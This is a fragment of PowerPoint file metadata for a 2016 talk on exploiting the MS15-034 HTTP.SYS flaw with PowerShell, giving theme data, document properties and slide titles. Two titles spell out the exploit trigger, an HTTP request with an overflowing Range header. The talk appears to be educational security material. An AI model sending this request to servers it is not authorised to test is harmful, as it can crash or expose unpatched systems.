      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="C2EA6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1FEE2289-88FB-467C-9C9A-54F3C8576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1420</TotalTime>
  <Words>1822</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>95</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Century Gothic</vt:lpstr>
      <vt:lpstr>Mesh</vt:lpstr>
      <vt:lpstr>Exploiting MS15-034 In PowerShell</vt:lpstr>
      <vt:lpstr>‘Remote Code Execution’ -in HTTP.SYS</vt:lpstr>
      <vt:lpstr>If the bad guy can execute code on your box, it isn’t your box anymore.</vt:lpstr>
      <vt:lpstr>HTTP.SYS is everywhere</vt:lpstr>
      <vt:lpstr>IIS Kernel Caching module</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Are we vulnerable?</vt:lpstr>
      <vt:lpstr>Request -&gt; Response</vt:lpstr>
      <vt:lpstr>GET / HTTP/1.1 Host: google.com Range: bytes=0-18446744073709551615 Connection: Close</vt:lpstr>
      <vt:lpstr>GET / HTTP/1.1`r`n Host: google.com`r`n Range: bytes=0-18446744073709551615`r`n Connection: Close `r`n `r`n</vt:lpstr>
      <vt:lpstr>Streams</vt:lpstr>
      <vt:lpstr>Working with TCP</vt:lpstr>
      <vt:lpstr>MS15034.psm1</vt:lpstr>
      <vt:lpstr>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Kieran Jacobsen</dc:creator>
  <cp:lastModifiedBy>Kieran Jacobsen</cp:lastModifiedBy>
  <cp:revision>82</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-01-02T08:21:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-01-17T08:50:48Z</dcterms:modified>
</cp:coreProperties>
</file>